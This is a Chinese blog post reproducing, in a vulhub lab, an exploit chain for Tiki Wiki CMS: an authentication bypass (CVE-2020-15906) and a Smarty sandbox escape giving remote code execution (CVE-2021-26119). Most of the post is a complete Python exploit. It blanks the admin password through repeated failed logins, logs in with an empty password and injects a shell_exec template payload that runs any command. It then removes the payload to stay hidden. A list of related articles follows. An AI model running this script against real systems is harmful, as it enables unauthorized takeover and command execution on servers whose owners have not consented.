Tiki Wiki CMS组件认证过绕过漏洞利用链(CVE-2020-15906)(CVE-2021-26119) 漏洞复现

最新推荐文章于 2023-09-17 13:21:19 发布
最新推荐文章于 2023-09-17 13:21:19 发布
阅读量1.2k 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: 网络安全 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114658200
版权

Tiki Wiki CMS组件认证过绕过漏洞(CVE-2020-15906)(CVE-2021-26119)

by ADummy

0x00利用路线

​ 爆破50次密码—>burpsuite抓包—>修改pass字段为空(坑点 记录好ticket,session,cookie)

0x01漏洞介绍

​ 在以下这些版本21.2,20.4,19.3,18.7,17.3,16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。

0x02漏洞复现

P牛写的poc

payload:

import requests
import sys
import re

def auth_bypass(s, t):
    d = {
        "ticket" : "",
        "user" : "admin",
        "pass" : "trololololol",
    }
    h = { "referer" : t }
    d["ticket"] = get_ticket(s, "%stiki-login.php" % t)
    d["pass"] = "" # blank login
    r = s.post("%stiki-login.php" % t, data=d, headers=h)
    r = s.get("%stiki-admin.php" % t)
    assert ("You do not have the permission that is needed" not in r.text), "(-) authentication bypass failed!"

def black_password(s, t):
    uri = "%stiki-login.php" % t
    # setup cookies here
    s.get(uri)
    ticket = get_ticket(s, uri)
    d = {
        'user':'admin', 
        'pass':'trololololol',
    }
    # crafted especially so unsuccessful_logins isn't recorded
    for i in range(0, 51):
        r = s.post(uri, d)
        if("Account requires administrator approval." in r.text):
            print("(+) admin password blanked!")
            return
    raise Exception("(-) auth bypass failed!") 

def get_ticket(s, uri):
    h = { "referer" : uri }
    r = s.get(uri)
    match = re.search('class="ticket" name="ticket" value="(.*)" \/>', r.text)
    assert match, "(-) csrf ticket leak failed!"
    return match.group(1)

def trigger_or_patch_ssti(s, t, c=None):
    # CVE-2021-26119
    p = { "page": "look" }
    h = { "referer" : t }
    bypass = "startrce{$smarty.template_object->smarty->disableSecurity()->display('string:{shell_exec(\"%s\")}')}endrce" % c
    d = {
        "ticket" : get_ticket(s, "%stiki-admin.php" % t),
        "feature_custom_html_head_content" : bypass if c else '',
        "lm_preference[]": "feature_custom_html_head_content"
    }
    r = s.post("%stiki-admin.php" % t, params=p, data=d, headers=h)
    r = s.get("%stiki-index.php" % t)
    if c != None:
        assert ("startrce" in r.text and "endrce" in r.text), "(-) rce failed!"
        cmdr = r.text.split("startrce")[1].split("endrce")[0]
        print(cmdr.strip())

def main():
    if(len(sys.argv) < 4):
        print("(+) usage: %s <host> <path> <cmd>" % sys.argv[0])
        print("(+) eg: %s 192.168.75.141 / id"% sys.argv[0])
        print("(+) eg: %s 192.168.75.141 /tiki-20.3/ id" % sys.argv[0])
        return
    p = sys.argv[2]
    c = sys.argv[3]
    p = p + "/" if not p.endswith("/") else p
    p = "/" + p if not p.startswith("/") else p
    t = "http://%s%s" % (sys.argv[1], p)
    s = requests.Session()
    print("(+) blanking password...")
    black_password(s, t)
    print("(+) getting a session...")
    auth_bypass(s, t)
    print("(+) auth bypass successful!")
    print("(+) triggering rce...\n")
    # trigger for rce
    trigger_or_patch_ssti(s, t, c)
    # patch so we stay hidden
    trigger_or_patch_ssti(s, t)

if __name__ == '__main__':
    main()

靶场内可以直接打。

在这里插入图片描述

0x03参考资料

https://srcincite.io/pocs/cve-2021-26119.py.txt

ADummy_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞篇 ] Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906
qq_51577576的博客
09-07 1389
[ vulhub漏洞篇 ] Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906 Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906)
锋刃科技的博客
03-05 3157
漏洞概述 Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。 影响版本 Tiki Tiki <21.2 环境搭建 https://github.com/vulhub/vulhub/...
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906)
EC_Carrot的博客
08-17 663
漏洞详细 Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。 漏洞 我们使用POC来进行,该POC先使用CVE-2020-15906绕过认证,获取管理员权限;再使用Smarty的沙盒绕过漏洞CVE-2021-26119)
Tiki靶机(CMS漏洞)
m0_66299232的博客
11-11 850
5.直接运行后发,可以结合bp使用admin用户免密登录。2.sudo -l 发可以执行任意命令,成功拿下!3.searchsploit tiki 查到可利用脚本。攻击机系统:kali linux 2021.1。4.下载下来后,查看是用pytho3写的脚本。6.抓包后把密码删掉,放包 即可成功登录。2.根据提示访问后,发是一个cms。1.用已知的账号密码进行22端口登录。7.随便点点后,发一组用户名密码。1.探测目标靶机开放端口和服务。虚拟机网络链接模式:桥接模式。2.用gobuster扫目录。
Tikiwiki CMS v13.0.zip
07-07
Tiki Wiki是基于PHP、ADOdb以及smarty开发的CMS(内容管理系统)/门户系统/群件(Groupware)系统。更重要的是Tiki Wiki是一个基于LGPL协议的开源工程,她由来自全世界范围的的开源爱好者、捐赠者参与开发维护的。   通过Tiki Wiki,您可以很轻松的搭建各种类型的站点、门户、内部网等。Tiki Wiki同样也是一个强大的基于Web的协作工具。Tiki Wiki内置了很多功能选项,当您需要某个功能时可以很方便的将该功能激活。Tiki Wiki的设计架构是面向全世界范围的、清爽以及易扩展的。Tiki Wiki除了拥有当前几个优秀的Wiki的所有功能外,并且还提供很多其他很有价值的功能。您可以通过 Tiki Wiki构建成论坛系统、聊天室、投票系统、客户支持网站以及其他。并且您还可以看到,Tiki Wiki开发、维护团队一直处于活跃状态,并将无限期的持续下去。您可以看到有越来越多的网站正基于Tiki Wiki建设当中。   Tiki Wiki的主要功能包括:文章库、论坛、电子报、博客日志、文件/图库系统、投票/调查问卷/测验系统、FAQ、聊天室、广告横幅管理系统、Webmail、行事历、主题控制、工作流、在线支持系统等等……完整的功能了表可以通过访问Tiki功能列表来获取。     相关阅读 同类推荐:博客系统下载
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
tiki组件CVE-2020-15906 && CVE-2021-26119
最新发布
11-24
tiki组件CVE-2020-15906 && CVE-2021-26119
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
Tiki Wiki CMS Groupware-开源
04-16
“软件使Wiki方式”使用PHP,MySQL的功能齐全的基于Web的多语言(40多种语言),紧密集成的多合一Wiki + CMS + Groupware,免费源软件(GNU / LGPL) ,Zend Framework,jQuery和Smarty。 Tiki可用于创建各种Web应用程序,站点,门户,知识库,Intranet和Extranet。 Tiki是具有最多内置功能的开源Web应用程序。 高度可配置和模块化,所有功能都是可选的,可通过基于Web的界面进行管理。 主要功能包括Wiki引擎,新闻文章,论坛,新闻通讯,博客,文件库,错误和问题跟踪器(表单生成器),民意调查/测验,横幅管理系统,日历,地图,移动设备,RSS提要,类别系统,标签,高级主题引擎,电子表格,图形,用户间消息传递,菜单,用户和组的高级权限系统,搜索引擎,外部身份验证等。安全报告:security@tiki.org
WikiCMS - Content Management System-开源
05-15
WikiCMS是一个简单的基于PHP和MySQL的网站内容管理系统。 预定义的内容(如留言簿,图片库或联系表格)使网页设计变得容易。
wiki CMS.zip
02-08
将代码分类备注,同时对内部代码进行了更详细的备注,希望对大家有帮助 将代码分类备注,同时对内部代码进行了更详细的备注,希望对大家有帮助
【vulhub系列】CVE-2020-15906 Tiki Wiki CMS Groupware 认证绕过漏洞
Wiofgb的博客
08-15 1010
CVE-2020-15906 Tiki Wiki CMS Groupware 认证绕过漏洞
深信服长沙php,PHP Smarty 模版沙箱逃逸漏洞CVE-2021-26119
weixin_32382335的博客
03-27 770
PHP Smarty 模版沙箱逃逸漏洞CVE-2021-261192021-02-25 23:40:03136sangfor组件介绍smarty是一个基于PHP开发的PHP模板引擎。它提供了逻辑与外在内容的分离,简单的讲,目的就是要使用PHP程序员同美工分离,使用的程序员改变程序的逻辑内容不会影响到美工的页面设计,美工重新修改页面不会影响到程序的程序逻辑,这在多人合作的项目中 显的尤为重要。漏洞描...
Vuln靶机系列:02TiKi-CMS漏洞利用-对新手非常友好!!!
weixin_45965246的博客
09-17 206
首次使用CMS漏洞该靶机通过的方式有多种,比如:sudo提权、Ubuntu提权使用到的python脚本挺多查看Ubuntu版本使用base64编码写入webshellSmarty沙盒绕过漏洞-RCE反弹shell。
绕过Tiktok强制登录
碎片的博客
02-08 1410
Tiktok检测到设备异常会强制用户登录,如何绕过呢?
Taocms SQL注入(CVE-2021-44915)--春秋云镜靶场
m7789的博客
11-24 977
Taocms 3.0.2版本存在SQL注入漏洞。该漏洞源于应用缺少对外部输入SQL语句的验证。攻击者可利用漏洞通过功能编辑类别进行SQL注入。
Web-CMS漏洞
凌云鹤YK
02-21 8328
Web-CMS漏洞Web-CMS漏洞漏洞一:ThinkPHP &lt;5.0.24 Request.php 远程代码执行漏洞漏洞二:ThinkPHP 5 &lt;=5.0.22 远程代码执行高危漏洞漏洞三:微擎最新版SQL注入漏洞四:微擎1.5.4任意用户删除漏洞 Web-CMS漏洞 漏洞一:ThinkPHP &lt;5.0.24 Request.php 远程代码执行漏洞 Url:https:/...
nacos权限绕过漏洞(CVE-2021-29441)
10-26
nacos权限绕过漏洞(CVE-2021-29441)是指在nacos进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。攻击者可以通过伪造请求头中的user-agent来绕过认证,获取到用户名...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值